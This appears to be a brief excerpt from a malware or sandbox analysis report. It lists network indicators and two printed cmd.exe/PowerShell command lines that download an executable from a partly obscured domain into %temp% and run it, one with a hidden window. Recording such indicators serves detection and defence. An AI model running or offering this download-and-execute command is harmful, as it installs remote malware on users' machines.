Technical Information
- http://va##lla.ml/04781000 as %temp%\qot321.exe
- DNS ASK va##lla.ml
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://va##lla.ml/04781000','%temp%\qot321.exe'); Start '%temp%\qot321.exe'' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://va##lla.ml/04781000','%temp%\qot321.exe'); Start '%temp%\qot321.exe'